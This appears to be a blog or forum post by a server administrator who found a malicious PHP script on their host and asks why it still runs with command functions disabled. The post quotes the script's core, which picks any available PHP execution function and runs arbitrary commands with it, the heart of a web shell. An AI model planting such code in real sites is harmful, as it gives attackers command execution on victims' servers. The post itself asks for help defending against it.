I had one problem on my server today and I discovered malicious code which is used to gain access to my system for attacker.
I have downloaded that php script, but what was weird is that I saw functions which are disabled in my php configuration.
Disabled are: passthru,exec,shell_exec,system.... among others
How is that possible?
This is part of code
function get_execution_method()
{
if(function_exists('passthru')){ $m = "passthru"; }
if(function_exists('exec')){ $m = "exec"; }
if(function_exists('shell_exec')){ $m = "shell_ exec"; }
if(function_exists('system')){ $m = "system"; }
if(!isset($m)) //No method found :-|
{
$m = "Disabled";
}
return($m);
}
function execute_command($method,$command)
{
if($method == "passthru")
{
passthru($command);
}
elseif($method == "exec")
{
exec($command,$result);
foreach($result as $output)
{
print $output."
";
}
}
elseif($method == "shell_exec")
{
print shell_exec($command);
}
elseif($method == "system")
{
system($command);
}
}
function perm($file)
{
if(file_exists($file))
{
return substr(sprintf('%o', fileperms($file)), -4);
}
else
{
return "????";
}
}
Just to be sure that there are no left overs, I have copied that script to new account which no one has access to except me. There is no htaccess file or php.ini. Script still works on that account. I have created phpinfo file to see php configuration for that file and here are disabled functions.
pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,system,passthru,shell_exec,proc_open,popen
As you can see, listed functions which are used in that script are inside disabled functions.
When I try to run some of disabled functions I get message
Warning: system() has been disabled for security reasons in /home/user....
Just to make sure, I have uploaded that script to different server and same was possible. That server also has same disabled functions.
How can I prevent this from allowing someone access to my files?
No comments:
Post a Comment